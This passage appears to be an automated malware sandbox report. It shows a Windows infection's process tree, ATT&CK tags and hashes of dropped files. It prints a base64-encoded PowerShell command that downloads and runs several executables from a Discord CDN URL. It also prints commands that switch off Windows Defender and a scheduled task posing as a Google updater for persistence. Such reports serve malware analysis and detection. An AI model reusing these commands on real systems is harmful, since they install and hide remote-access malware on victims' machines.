        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAxADIANwA5ADkANAA2ADMAOQAyADkANQA3ADIAMQA1ADgANAAvADEAMQAyADgAMAAxADQAOQA4ADEAMQAzADcANAAzADIANwAwADgALwBCAHUAaQBsAHQALgBlAHgAZQAnACwAIAA8ACMAdQBqAHQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBnAGcAdQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB4AGkAeQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBCAHUAaQBsAHQALgBlAHgAZQAnACkAKQA8ACMAbQB1AHcAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEAMgA3ADkAOQA0ADYAMwA5ADIAOQA1ADcAMgAxADUAOAA0AC8AMQAxADIAOAAwADEANAA5ADgAMQA1ADkAOAA4ADEAOAA0ADUANAAvAG4AdABvAHMAawByAGwAbgAuAGUAeABlACcALAAgADwAIwBtAHIAeAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHoAYwBrACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGMAZQBjACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAG4AdABvAHMAawByAGwAbgAuAGUAeABlACcAKQApADwAIwBmAG4AZwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMQAyADcAOQA5ADQANgAzADkAMgA5ADUANwAyADEANQA4ADQALwAxADEAMgA4ADEAMwA2ADIAMQA1ADIAOQA2ADcAMwA3ADMAMwAwAC8AVwBpAG4AUgBBAFIALgBlAHgAZQAnACwAIAA8ACMAcABwAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBoAHMAdgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB3AHUAZQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBXAGkAbgBSAEEAUgAuAGUAeABlACcAKQApADwAIwBjAG0AeQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMQAyADcAOQA5ADQANgAzADkAMgA5ADUANwAyADEANQA4ADQALwAxADEAMgA4ADEAMwA2ADIAMQA1ADkAMAA0ADkAMQA5ADYAMQAyAC8AUgB1AG4AdABpAG0AZQBCAHIAbwBrAGUAcgAuAGUAeABlACcALAAgADwAIwB3AGcAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHEAdgBjACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGkAegB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFIAdQBuAHQAaQBtAGUAQgByAG8AawBlAHIALgBlAHgAZQAnACkAKQA8ACMAaAB2AHQAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbABjAGIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAG4AZwB2ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEIAdQBpAGwAdAAuAGUAeABlACcAKQA8ACMAZQBpAGQAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcgBhAHMAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAG4AbQBuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAG4AdABvAHMAawByAGwAbgAuAGUAeABlACcAKQA8ACMAaQBwAGoAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgBnAHQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHYAaABlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFcAaQBuAFIAQQBSAC4AZQB4AGUAJwApADwAIwBpAHYAZAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB1AHkAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaAByAGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUgB1AG4AdABpAG0AZQBCAHIAbwBrAGUAcgAuAGUAeABlACcAKQA8ACMAcABnAGsAIwA+AA=="
        12⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4300
        
        C:\Users\Admin\AppData\Local\Temp\Built.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Built.exe"
        13⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:804
        
        C:\Users\Admin\AppData\Local\Temp\Built.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Built.exe"
        14⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:3316
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
        15⤵
        Suspicious use of WriteProcessMemory
        
        PID:708
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        16⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3100
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        15⤵
        Suspicious use of WriteProcessMemory
        
        PID:1388
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        16⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2224
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
        15⤵
        Suspicious use of WriteProcessMemory
        
        PID:348
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
        16⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2124
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        15⤵
        Suspicious use of WriteProcessMemory
        
        PID:1828
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        16⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:96
        
        C:\Users\Admin\AppData\Local\Temp\ntoskrln.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ntoskrln.exe"
        13⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:4508
        
        C:\Users\Admin\AppData\Local\Temp\WinRAR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WinRAR.exe"
        13⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Checks whether UAC is enabled
        Drops desktop.ini file(s)
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Drops file in Program Files directory
        Drops file in Windows directory
        Suspicious use of WriteProcessMemory
        
        PID:4492
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zzisbnht.cmdline"
        14⤵
        Suspicious use of WriteProcessMemory
        
        PID:4936
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES36F5.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC36F4.tmp"
        15⤵
        
        PID:652
        
        C:\Program Files (x86)\Orcus\Orcus.exe
        
        "C:\Program Files (x86)\Orcus\Orcus.exe"
        14⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:2968
        
        C:\Users\Admin\AppData\Roaming\BossWatchdog.exe
        
        "C:\Users\Admin\AppData\Roaming\BossWatchdog.exe" /launchSelfAndExit "C:\Program Files (x86)\Orcus\Orcus.exe" 2968 /protectFile
        15⤵
        Executes dropped EXE
        
        PID:4020
        
        C:\Users\Admin\AppData\Roaming\BossWatchdog.exe
        
        "C:\Users\Admin\AppData\Roaming\BossWatchdog.exe" /watchProcess "C:\Program Files (x86)\Orcus\Orcus.exe" 2968 "/protectFile"
        16⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:4396
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        13⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:4864
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#jwqvlizb#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:604
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#vscmm#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\system.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\system.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4844
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:4316
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:4424
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#jwqvlizb#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2572
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  PID:4744
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:1632

C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:2384

C:\Program Files (x86)\Orcus\Orcus.exe
"C:\Program Files (x86)\Orcus\Orcus.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4940

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Orcus\Orcus.exe

Filesize
9.4MB

MD5
dccefbeb3d7b05dce91900d8a248f4b4

SHA1
d5e790edbdf4c3b0dde48316ed1de40056e7cfc6

SHA256
fbb10b36377a7cb362f33c165305eb8d9518324d3d292e1413ba45ff0d086a4b

SHA512
4876958993c977af8707ac8e3adb68df145a246338208560af834d0b388586ca6dc562c8c4c506a2951d652ee4cc7a80a46aaf64d36ce6f57321d71a080ee180

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
ea6243fdb2bfcca2211884b0a21a0afc

SHA1
2eee5232ca6acc33c3e7de03900e890f4adf0f2f

SHA256
5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8

SHA512
189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
9ece934bc783d0f42538c9a8424850a4

SHA1
25598c87f9b6905efd69778011039d0b789dfe06

SHA256
894d845d655066b80d39942edfba7e5778213cb664cbdb5e587ed3bfaf208a1b

SHA512
e1e99694488ee4534f894370fa76c675936a38245f8643f04ba1ccde28f0f4cad966669d66e6f75557426ac5c6043b3d0839280cb9bbd6081938b778782c3335

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
c2a54be0171a786fa4015bd7c85ef41f

SHA1
d71e1c1e03479e59a26598ec09af92498679d35b

SHA256
508f32ed9b348d397aa06725183d6d8d02dcb92af6f100d3cec05f67b47df16a

SHA512
966e9354a254e09daf7dfff3d162a2cab81e1f90b2d102ce7b835fa9c7c3145fe79141c0aea41c6c1e02402c2686178afc9846781b17083bed14548e886596d7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
dc38f20b8a9fe44c33cc39139052617d

SHA1
c5a818dff7360969868e0490b5506d43d97de4ac

SHA256
d05175212db4025e1f4bdbfca1e372e02095a1f26f24fe16969e6a754c1e9ebc

SHA512
ee47e6a73d571c8ccf5876e7ad3e2f63d518803699d7101bc9034f723d67b0f55367be648f0f2ec6ec25681717a1cc7eeb0fd064b24099bdcc718f7ed3690f66

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
c0f1a667bfdf047635c09dd602a8ba5d

SHA1
358fe47dd0639b06b37971b64a99d8ceb5b294fc

SHA256
a3d907cadb997be83e9699405ddbef0bca38b2eae9cbfa120d50ecb130653d15

SHA512
89c7d6bd9025be064384ce125ba6004ae5828c84ca0ce111cf6aec8e4db7ebf3bdeb4609dfc055fc4c52fa1d252bdd28195d0850e4ca762d57e8afbd7a489686

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
283302618edbed00576fd25f83ca7b56

SHA1
98a98fd830217373599c6e883ef0f5530fdf56a2

SHA256
2fd7eb9bd81ad8dcc6741c4b0ec4056706c8a82433bfc08d56073db0728fe2c9

SHA512
b2e9c056e11038b90347f716f2123a8dc284b476d83bf2d759f91bcc0f7ad514a66bf8a76f26a582b3276b7e0174480f4d5ed1da2b525a8b0829cc23b19f8980

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6b9add8338c0edf23975e667ec9a81ad

SHA1
a86c98679c253ac0acc89d2eb45c94d5246c279a

SHA256
49ce650a2247ce6dd14ce8cd1d3a3df27f0448858ba610018e30962569d0e789

SHA512
4246b40cda9beb83c8528255b9acdcbaefb7ab52aea3b9a7d50a6550f83f91c6cd8aa96d212ade32a7669d2f23932e270fb056d49a290c1319b87f246944ee5e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6b9add8338c0edf23975e667ec9a81ad

SHA1
a86c98679c253ac0acc89d2eb45c94d5246c279a

SHA256
49ce650a2247ce6dd14ce8cd1d3a3df27f0448858ba610018e30962569d0e789

SHA512
4246b40cda9beb83c8528255b9acdcbaefb7ab52aea3b9a7d50a6550f83f91c6cd8aa96d212ade32a7669d2f23932e270fb056d49a290c1319b87f246944ee5e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Built.exe

Filesize
7.0MB

MD5
cfed2cdc948681a65e8335c2ceac80be

SHA1
3e7d07ea0d5afc08a41a2eeb5cb383ad05732def

SHA256
03c894549fb563fd7c33798a130cbab453bc64e4fc64aa8d2174eb8b2e76c488

SHA512
a41ccc78c1c3f70db6f6363555841f847c9a72e53672cc31e12ff3064c98bacae3a47cdabace78617fcd66f40e26aa3e55766de02b8dbb2a93280e2aa6b1cf9d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Built.exe

Filesize
7.0MB

MD5
cfed2cdc948681a65e8335c2ceac80be

SHA1
3e7d07ea0d5afc08a41a2eeb5cb383ad05732def

SHA256
03c894549fb563fd7c33798a130cbab453bc64e4fc64aa8d2174eb8b2e76c488

SHA512
a41ccc78c1c3f70db6f6363555841f847c9a72e53672cc31e12ff3064c98bacae3a47cdabace78617fcd66f40e26aa3e55766de02b8dbb2a93280e2aa6b1cf9d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Built.exe

Filesize
7.0MB

MD5
cfed2cdc948681a65e8335c2ceac80be

SHA1
3e7d07ea0d5afc08a41a2eeb5cb383ad05732def

SHA256
03c894549fb563fd7c33798a130cbab453bc64e4fc64aa8d2174eb8b2e76c488

SHA512
a41ccc78c1c3f70db6f6363555841f847c9a72e53672cc31e12ff3064c98bacae3a47cdabace78617fcd66f40e26aa3e55766de02b8dbb2a93280e2aa6b1cf9d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe

Filesize
19.5MB

MD5
facc27746eefebdb142ed8de16b4fab9

SHA1
d1742a647e7bfc88215873e9ada787f912e509e6

SHA256
b0129fd707e94a036b8ab8c499be2c481858db2728148321f11327e161024600

SHA512
e583dd1ab453b03ce66a219edf2983e3937c36c420d63c60763984f1410a4d8d7a175e888e94366d6e38eb35c9e77d157c59fba83055393ea6037dcb5068fff8

Download Submit
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe

Filesize
19.5MB

MD5
facc27746eefebdb142ed8de16b4fab9

SHA1
d1742a647e7bfc88215873e9ada787f912e509e6

SHA256
b0129fd707e94a036b8ab8c499be2c481858db2728148321f11327e161024600

SHA512
e583dd1ab453b03ce66a219edf2983e3937c36c420d63c60763984f1410a4d8d7a175e888e94366d6e38eb35c9e77d157c59fba83055393ea6037dcb5068fff8

Download Submit
C:\Users\Admin\AppData\Local\Temp\VACBAN.VMP.EXE

Filesize
11.9MB

MD5
f0e134b1bd3f71ea89c2c011ebd36283

SHA1
428b730aa7a230a5c39a5924fc6d9263c186affd

SHA256
7d21d0a42143048fb1b7cb3b9a70a1a49f3f4b545fcc378f0fbca6091f62e422

SHA512
eb50f045a3d11e7b8d19f5c4ccebff91d924a3d5b00091bb45e1b4250222232867d3b4e4c00ede96da21be11c01b841d6425a886be71cb302b45c296a616d2ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\VACBAN.VMP.EXE

Filesize
11.9MB

MD5
f0e134b1bd3f71ea89c2c011ebd36283

SHA1
428b730aa7a230a5c39a5924fc6d9263c186affd

SHA256
7d21d0a42143048fb1b7cb3b9a70a1a49f3f4b545fcc378f0fbca6091f62e422

SHA512
eb50f045a3d11e7b8d19f5c4ccebff91d924a3d5b00091bb45e1b4250222232867d3b4e4c00ede96da21be11c01b841d6425a886be71cb302b45c296a616d2ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\WinRAR.exe

Filesize
9.4MB

MD5
dccefbeb3d7b05dce91900d8a248f4b4

SHA1
d5e790edbdf4c3b0dde48316ed1de40056e7cfc6

SHA256
fbb10b36377a7cb362f33c165305eb8d9518324d3d292e1413ba45ff0d086a4b

SHA512
4876958993c977af8707ac8e3adb68df145a246338208560af834d0b388586ca6dc562c8c4c506a2951d652ee4cc7a80a46aaf64d36ce6f57321d71a080ee180

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8042\VCRUNTIME140.dll

Filesize
96KB

MD5
f12681a472b9dd04a812e16096514974

SHA1
6fd102eb3e0b0e6eef08118d71f28702d1a9067c

SHA256
d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8

SHA512
7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8042\_bz2.pyd

Filesize
46KB

MD5
0c13627f114f346604b0e8cbc03baf29

SHA1
bf77611d924df2c80aabcc3f70520d78408587a2

SHA256
df1e666b55aae6ede59ef672d173bd0d64ef3e824a64918e081082b8626a5861

SHA512
c97fa0f0988581eae5194bd6111c1d9c0e5b1411bab47df5aa7c39aad69bfbeca383514d6aaa45439bb46eacf6552d7b7ed08876b5e6864c8507eaa0a72d4334

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8042\_ctypes.pyd

Filesize
57KB

MD5
38fb83bd4febed211bd25e19e1cae555

SHA1
4541df6b69d0d52687edb12a878ae2cd44f82db6

SHA256
cd31af70cbcfe81b01a75ebeb2de86079f4cbe767b75c3b5799ef8b9f0392d65

SHA512
f703b231b675c45accb1f05cd34319b5b3b7583d85bf2d54194f9e7c704fbcd82ef2a2cd286e6a50234f02c43616fbeccfd635aefd73424c1834f5dca52c0931

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8042\_hashlib.pyd

Filesize
33KB

MD5
596df8ada4b8bc4ae2c2e5bbb41a6c2e

SHA1
e814c2e2e874961a18d420c49d34b03c2b87d068

SHA256
54348cfbf95fd818d74014c16343d9134282d2cf238329eec2cda1e2591565ec

SHA512
e16aad5230e4af7437b19c3db373b1a0a0a84576b608b34430cced04ffc652c6fb5d8a1fe1d49ac623d8ae94c8735800c6b0a12c531dcdd012b05b5fd61dff2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8042\_lzma.pyd

Filesize
84KB

MD5
8d9e1bb65a192c8446155a723c23d4c5

SHA1
ea02b1bf175b7ef89ba092720b3daa0c11bef0f0

SHA256
1549fe64b710818950aa9bf45d43fe278ce59f3b87b3497d2106ff793efa6cf7

SHA512
4d67306fe8334f772fe9d463cb4f874a8b56d1a4ad3825cff53cae4e22fa3e1adba982f4ea24785312b73d84a52d224dfb4577c1132613aa3ae050a990e4abdf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8042\_queue.pyd

Filesize
24KB

MD5
fbbbfbcdcf0a7c1611e27f4b3b71079e

SHA1
56888df9701f9faa86c03168adcd269192887b7b

SHA256
699c1f0f0387511ef543c0df7ef81a13a1cffde4ce4cd43a1baf47a893b99163

SHA512
0a5ba701653ce9755048ae7b0395a15fbb35509bef7c4b4fe7f11dc4934f3bd298bcddbf2a05b61f75f8eb44c4c41b3616f07f9944e0620b031cbe87a7443284

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8042\_socket.pyd

Filesize
41KB

MD5
4351d7086e5221398b5b78906f4e84ac

SHA1
ba515a14ec1b076a6a3eab900df57f4f37be104d

SHA256
a0fa25eef91825797f01754b7d7cf5106e355cf21322e926632f90af01280abe

SHA512
a1bcf51e797ccae58a0b4cfe83546e5e11f8fc011ca3568578c42e20bd7a367a5e1fa4237fb57aa84936eec635337e457a61a2a4d6eca3e90e6dde18ae808025

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8042\_sqlite3.pyd

Filesize
54KB

MD5
d678600c8af1eeeaa5d8c1d668190608

SHA1
080404040afc8b6e5206729dd2b9ee7cf2cb70bc

SHA256
d6960f4426c09a12488eb457e62506c49a58d62a1cb16fbc3ae66b260453c2ed

SHA512
8fd5f0fd5bd60c6531e1b4ad867f81da92d5d54674028755e5680fb6005e6444805003d55b6cbaf4cdad7b4b301cffab7b010229f6fd9d366405b8ade1af72d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8042\_ssl.pyd

Filesize
60KB

MD5
156b1fa2f11c73ed25f63ee20e6e4b26

SHA1
36189a5cde36d31664acbd530575a793fc311384

SHA256
a9b5f6c7a94fb6bfaf82024f906465ff39f9849e4a72a98a9b03fc07bf26da51

SHA512
a8181ffeb3cf8ef2a25357217a3dd05242cc0165473b024cf0aeb3f42e21e52c2550d227a1b83a6e5dab33a185d78e86e495e9634e4f4c5c4a1aec52c5457dca

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8042\base_library.zip

Filesize
1.7MB

MD5
334e5d6e591eccd91d2121194db22815

SHA1
